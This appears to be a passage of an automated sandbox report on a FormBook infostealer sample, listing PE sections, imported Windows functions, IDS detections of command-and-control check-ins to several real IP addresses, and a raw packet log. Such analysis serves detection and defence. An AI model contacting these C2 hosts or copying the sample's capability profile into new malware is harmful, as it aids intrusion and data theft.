                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x46d8.rsrc
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                            .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                            .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                            .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .rsrc0xab0000x46d80x4800689ce79f6c8a1d18b3e79fabd047a9b7False0.5035807291666666data5.538688997728395IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                            RT_ICON0xab4480x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                                            RT_ICON0xab5700x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                                            RT_ICON0xab6980x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                                            RT_ICON0xab7c00x1783PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9451736168798803
                                                                                                                                            RT_MENU0xacf480x50dataEnglishGreat Britain0.9
                                                                                                                                            RT_DIALOG0xacf980xfcdataEnglishGreat Britain0.6507936507936508
                                                                                                                                            RT_STRING0xad0980x530dataEnglishGreat Britain0.33960843373493976
                                                                                                                                            RT_STRING0xad5c80x690dataEnglishGreat Britain0.26964285714285713
                                                                                                                                            RT_STRING0xadc580x4d0dataEnglishGreat Britain0.36363636363636365
                                                                                                                                            RT_STRING0xae1280x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                                            RT_STRING0xae7280x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                                            RT_STRING0xaed880x388dataEnglishGreat Britain0.377212389380531
                                                                                                                                            RT_STRING0xaf1100x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                                                                            RT_GROUP_ICON0xaf2680x14dataEnglishGreat Britain1.2
                                                                                                                                            RT_GROUP_ICON0xaf2800x14dataEnglishGreat Britain1.15
                                                                                                                                            RT_GROUP_ICON0xaf2980x14dataEnglishGreat Britain1.25
                                                                                                                                            RT_GROUP_ICON0xaf2b00x14dataEnglishGreat Britain1.25
                                                                                                                                            RT_VERSION0xaf2c80x19cdataEnglishGreat Britain0.5339805825242718
                                                                                                                                            RT_MANIFEST0xaf4680x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
                                                                                                                                            DLLImport
                                                                                                                                            WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                                                                            VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                                                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                                            COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                                                                            MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                                                                            WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                                                                            PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                                                            USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                                                                            KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                                                                                                            USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                                                                                                            GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                                                                                            COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                            ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                                                                                            SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                                            ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                                                                                                            OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                            EnglishGreat Britain
                                                                                                                                            EnglishUnited States
                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                            2024-10-10T12:50:54.115454+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.661449156.242.132.8280TCP
                                                                                                                                            2024-10-10T12:50:54.115454+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.661449156.242.132.8280TCP
                                                                                                                                            2024-10-10T12:51:29.053387+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.661251156.242.132.8280TCP
                                                                                                                                            2024-10-10T12:51:29.053387+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.661251156.242.132.8280TCP
                                                                                                                                            2024-10-10T12:51:52.693114+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6613873.33.130.19080TCP
                                                                                                                                            2024-10-10T12:51:55.238418+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6613893.33.130.19080TCP
                                                                                                                                            2024-10-10T12:51:57.785486+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6613903.33.130.19080TCP
                                                                                                                                            2024-10-10T12:52:00.340822+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.6613913.33.130.19080TCP
                                                                                                                                            2024-10-10T12:52:00.340822+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6613913.33.130.19080TCP
                                                                                                                                            2024-10-10T12:52:06.773065+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.66139238.47.233.6580TCP
                                                                                                                                            2024-10-10T12:52:09.228881+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.66139338.47.233.6580TCP
                                                                                                                                            2024-10-10T12:52:12.398073+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.66139438.47.233.6580TCP
                                                                                                                                            2024-10-10T12:52:14.355915+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.66139638.47.233.6580TCP
                                                                                                                                            2024-10-10T12:52:14.355915+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.66139638.47.233.6580TCP
                                                                                                                                            2024-10-10T12:52:19.876918+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.661398188.114.97.380TCP
                                                                                                                                            2024-10-10T12:52:22.412679+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.661399188.114.97.380TCP
                                                                                                                                            2024-10-10T12:52:24.994533+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.661400188.114.97.380TCP
                                                                                                                                            2024-10-10T12:52:27.709824+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.661401188.114.97.380TCP
                                                                                                                                            2024-10-10T12:52:27.709824+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.661401188.114.97.380TCP
                                                                                                                                            2024-10-10T12:52:34.662818+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.661402197.189.237.18680TCP
                                                                                                                                            2024-10-10T12:52:37.209627+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.661403197.189.237.18680TCP
                                                                                                                                            2024-10-10T12:52:39.821642+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.661404197.189.237.18680TCP
                                                                                                                                            2024-10-10T12:52:42.511060+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.661405197.189.237.18680TCP
                                                                                                                                            2024-10-10T12:52:42.511060+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.661405197.189.237.18680TCP
                                                                                                                                            2024-10-10T12:52:48.237776+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.66140767.223.117.18980TCP
                                                                                                                                            2024-10-10T12:52:50.784546+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.66140867.223.117.18980TCP
                                                                                                                                            2024-10-10T12:52:53.309675+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.66140967.223.117.18980TCP
                                                                                                                                            2024-10-10T12:52:55.875893+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.66141067.223.117.18980TCP
                                                                                                                                            2024-10-10T12:52:55.875893+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.66141067.223.117.18980TCP
                                                                                                                                            2024-10-10T12:53:01.475921+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6614113.33.130.19080TCP
                                                                                                                                            2024-10-10T12:53:04.031121+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6614123.33.130.19080TCP
                                                                                                                                            2024-10-10T12:53:06.556866+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6614133.33.130.19080TCP
                                                                                                                                            2024-10-10T12:53:09.154942+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.6614143.33.130.19080TCP
                                                                                                                                            2024-10-10T12:53:09.154942+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6614143.33.130.19080TCP
                                                                                                                                            2024-10-10T12:53:15.217816+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.661415217.70.184.5080TCP
                                                                                                                                            2024-10-10T12:53:17.473803+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.661416217.70.184.5080TCP
                                                                                                                                            2024-10-10T12:53:20.094127+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.661417217.70.184.5080TCP
                                                                                                                                            2024-10-10T12:53:22.612007+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.661418217.70.184.5080TCP
                                                                                                                                            2024-10-10T12:53:22.612007+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.661418217.70.184.5080TCP
                                                                                                                                            2024-10-10T12:53:28.220785+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.66141945.33.18.4480TCP
                                                                                                                                            2024-10-10T12:53:30.883677+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.66142045.33.18.4480TCP
                                                                                                                                            2024-10-10T12:53:33.603949+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.66142145.33.18.4480TCP
                                                                                                                                            2024-10-10T12:53:36.170474+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.66142345.33.18.4480TCP
                                                                                                                                            2024-10-10T12:53:36.170474+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.66142345.33.18.4480TCP
                                                                                                                                            2024-10-10T12:53:42.473797+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.66142454.67.42.14580TCP
                                                                                                                                            2024-10-10T12:53:44.770072+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.66142554.67.42.14580TCP
                                                                                                                                            2024-10-10T12:53:47.939826+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.66142654.67.42.14580TCP
                                                                                                                                            2024-10-10T12:53:50.392877+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.66142754.67.42.14580TCP
                                                                                                                                            2024-10-10T12:53:50.392877+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.66142754.67.42.14580TCP
                                                                                                                                            2024-10-10T12:53:56.710210+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.661428172.67.181.15080TCP
                                                                                                                                            2024-10-10T12:53:59.179256+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.661429172.67.181.15080TCP
                                                                                                                                            2024-10-10T12:54:01.612140+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.661430172.67.181.15080TCP
                                                                                                                                            2024-10-10T12:54:04.546296+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.661431172.67.181.15080TCP
                                                                                                                                            2024-10-10T12:54:04.546296+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.661431172.67.181.15080TCP
                                                                                                                                            2024-10-10T12:54:10.137105+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6614323.33.130.19080TCP
                                                                                                                                            2024-10-10T12:54:12.772246+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6614333.33.130.19080TCP
                                                                                                                                            2024-10-10T12:54:15.324852+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6614343.33.130.19080TCP
                                                                                                                                            2024-10-10T12:54:17.974077+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.6614353.33.130.19080TCP
                                                                                                                                            2024-10-10T12:54:17.974077+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6614353.33.130.19080TCP
                                                                                                                                            2024-10-10T12:54:23.669343+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.661436217.70.184.5080TCP
                                                                                                                                            2024-10-10T12:54:26.849290+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.661437217.70.184.5080TCP
                                                                                                                                            2024-10-10T12:54:29.665921+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.661438217.70.184.5080TCP
                                                                                                                                            2024-10-10T12:54:31.416958+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.661440217.70.184.5080TCP
                                                                                                                                            2024-10-10T12:54:31.416958+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.661440217.70.184.5080TCP
                                                                                                                                            2024-10-10T12:54:36.938797+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6614413.33.130.19080TCP
                                                                                                                                            2024-10-10T12:54:39.486002+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6614423.33.130.19080TCP
                                                                                                                                            2024-10-10T12:54:42.034163+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6614433.33.130.19080TCP
                                                                                                                                            2024-10-10T12:54:44.559896+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.6614443.33.130.19080TCP
                                                                                                                                            2024-10-10T12:54:44.559896+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6614443.33.130.19080TCP
                                                                                                                                            2024-10-10T12:54:50.449011+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.661445208.91.197.2780TCP
                                                                                                                                            2024-10-10T12:54:52.965963+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.661446208.91.197.2780TCP
                                                                                                                                            2024-10-10T12:54:55.517982+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.661447208.91.197.2780TCP
                                                                                                                                            2024-10-10T12:54:58.773482+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.661448208.91.197.2780TCP
                                                                                                                                            2024-10-10T12:54:58.773482+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.661448208.91.197.2780TCP
                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Oct 10, 2024 12:51:28.165051937 CEST6125180192.168.2.6156.242.132.82
                                                                                                                                            Oct 10, 2024 12:51:28.170032978 CEST8061251156.242.132.82192.168.2.6
                                                                                                                                            Oct 10, 2024 12:51:28.170130968 CEST6125180192.168.2.6156.242.132.82
                                                                                                                                            Oct 10, 2024 12:51:28.176440001 CEST6125180192.168.2.6156.242.132.82
                                                                                                                                            Oct 10, 2024 12:51:28.181343079 CEST8061251156.242.132.82192.168.2.6
                                                                                                                                            Oct 10, 2024 12:51:29.053147078 CEST8061251156.242.132.82192.168.2.6
                                                                                                                                            Oct 10, 2024 12:51:29.053386927 CEST6125180192.168.2.6156.242.132.82
                                                                                                                                            Oct 10, 2024 12:51:29.054440975 CEST6125180192.168.2.6156.242.132.82
                                                                                                                                            Oct 10, 2024 12:51:29.059408903 CEST8061251156.242.132.82192.168.2.6
                                                                                                                                            Oct 10, 2024 12:51:52.232300997 CEST6138780192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:51:52.237304926 CEST80613873.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:51:52.237399101 CEST6138780192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:51:52.252243996 CEST6138780192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:51:52.257356882 CEST80613873.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:51:52.693027020 CEST80613873.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:51:52.693114042 CEST6138780192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:51:53.756186008 CEST6138780192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:51:53.761456013 CEST80613873.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:51:54.776298046 CEST6138980192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:51:54.781536102 CEST80613893.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:51:54.781646013 CEST6138980192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:51:54.796657085 CEST6138980192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:51:54.801548958 CEST80613893.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:51:55.238303900 CEST80613893.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:51:55.238418102 CEST6138980192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:51:56.303102970 CEST6138980192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:51:56.308435917 CEST80613893.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:51:57.321225882 CEST6139080192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:51:57.326483965 CEST80613903.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:51:57.326591969 CEST6139080192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:51:57.335443974 CEST6139080192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:51:57.340354919 CEST80613903.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:51:57.340502977 CEST80613903.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:51:57.785274029 CEST80613903.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:51:57.785485983 CEST6139080192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:51:58.849973917 CEST6139080192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:51:58.855180025 CEST80613903.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:51:59.868540049 CEST6139180192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:51:59.873491049 CEST80613913.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:51:59.873584032 CEST6139180192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:51:59.879329920 CEST6139180192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:51:59.884254932 CEST80613913.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:00.340590954 CEST80613913.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:00.340619087 CEST80613913.33.130.190192.168.2.6
